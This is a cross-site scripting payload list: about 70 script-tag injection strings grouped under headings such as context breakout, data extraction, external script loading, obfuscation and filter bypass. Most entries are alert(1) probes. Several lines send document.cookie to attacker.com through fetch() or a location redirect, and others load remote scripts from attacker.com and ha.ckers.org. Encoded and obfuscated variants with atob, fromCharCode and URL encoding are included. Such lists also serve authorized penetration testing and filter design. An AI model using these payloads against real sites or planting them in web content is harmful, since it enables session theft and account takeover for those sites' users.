ULTIMATE SCRIPT-TAG XSS PAYLOAD LIST (MERGED 10/10)
⸻

1. CORE EXECUTION

<script>alert(1)</script>
<script>alert('XSS')</script>
<script>prompt(1)</script>
<script>confirm(1)</script>
⸻

2. CONTEXT BREAKOUT (CRITICAL)

"><script>alert(1)</script>
'><script>alert(1)</script>
"/><script>alert(1)</script>
'></script><script>alert(1)</script>
</script><script>alert(1)</script>
⸻

3. DATA EXTRACTION (REAL ATTACK)

<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(document.location)</script>
<script>alert(window.origin)</script>
<script>fetch("https://attacker.com?c="+document.cookie)</script>
<script>location="https://attacker.com?c="+document.cookie</script>
⸻

4. EXTERNAL SCRIPT LOADING

<script src=//attacker.com/xss.js></script>
<script src="http://attacker.com/xss.js"></script>
<script src=//ha.ckers.org/xss.js></script>
<script src="data:text/javascript,alert(1)"></script>
⸻

5. JAVASCRIPT EXECUTION ENGINE (VERY IMPORTANT)

<script>eval("alert(1)")</script>
<script>new Function("alert(1)")()</script>
<script>setTimeout("alert(1)")</script>
<script>setInterval("alert(1)")</script>
<script>window</script>
<script>this.alert(1)</script>
<script>top.alert(1)</script>
<script>parent.alert(1)</script>
<script>(alert)(1)</script>
<script>Function("alert(1)")()</script>
⸻

6. OBFUSCATION / ENCODING / BYPASS

<script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval(atob("YWxlcnQoMSk="))</script>
<script>[]["filter"]["constructor"]("alert(1)")()</script>
<script>top</script>
⸻

7. ES6 / MODERN PAYLOADS

<script>alert`1`</script>
<script>import('data:text/javascript,alert(1)')</script>
<script>setTimeout(()=>alert(1))</script>
<script>(()=>alert(1))()</script>
⸻

8. POLYGLOT / PARSER ABUSE

<<script>alert(1)//<<</script>
<script>document.write("<scr"+"ipt>alert(1)</scr"+"ipt>")</script>
</TITLE><script>alert(1)</script>
<script>/*<script>*/alert(1)</script>
⸻

9. INVALID / FILTER BYPASS SYNTAX

<script x>alert(1)</script>
<script 1=2>alert(1)</script>
<script/**/>alert(1)</script>
<script/***/>alert(1)</script>
<script ^_^>alert(1)</script>
⸻

10. COMMENT / WHITESPACE BYPASS

<script><!--
alert(1)
//--></script>

<script>
/**/
alert(1)
/**/
</script>
⸻

11. COOKIE & SESSION MANIPULATION

<script>document.cookie="xss=1"</script>
<script>document.cookie="session=steal"</script>
<script>fetch("//attacker.com?c="+document.cookie)</script>
⸻

12. DOM-BASED EXECUTION

<script>document.write(document.cookie)</script>
<script>document.body.innerHTML="<img src=x onerror=alert(1)>"</script>
<script>document.location='javascript:alert(1)'</script>
⸻

13. ENCODED PAYLOADS

%3Cscript%3Ealert(1)%3C/script%3E
%253Cscript%253Ealert(1)%253C/script%253E
%00<script>alert(1)</script>
⸻

14. ADVANCED EXECUTION TRICKS

<script>throw alert(1)</script>
<script>onerror=alert;throw 1</script>
<script>location=`javascript:alert(1)`</script>
<script>history.pushState('', '', 'javascript:alert(1)')</script>
⸻

15. HYBRID / CHAINED PAYLOADS

<script src=data:text/javascript,eval(atob("YWxlcnQoMSk="))></script>
<script>setTimeout(atob("YWxlcnQoMSk="))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
⸻
